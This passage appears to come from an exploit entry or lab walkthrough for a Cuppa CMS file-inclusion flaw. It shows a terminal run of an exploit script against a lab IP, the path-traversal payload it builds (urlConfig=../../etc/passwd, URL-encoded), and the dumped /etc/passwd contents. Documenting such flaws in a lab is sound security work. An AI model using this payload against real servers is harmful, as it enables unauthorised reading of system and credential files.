news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
"""

┌──(root💀kali)-[~]
└─# python3 Cuppa_CMS_File_Inclusion.py
[*] Enter the target ip adress.
>> 192.168.6.135
[*] The target address is similar to which of the following?
1. http://192.168.6.135/
2. http://192.168.6.135/administator/
3. http://192.168.6.135/cuppa/
4. Other
>> 2
[*] Enter the full path of the file you want to read.
>> /etc/passwd
[*] Your payload: urlConfig=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd

        root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false

Category: Walkthrough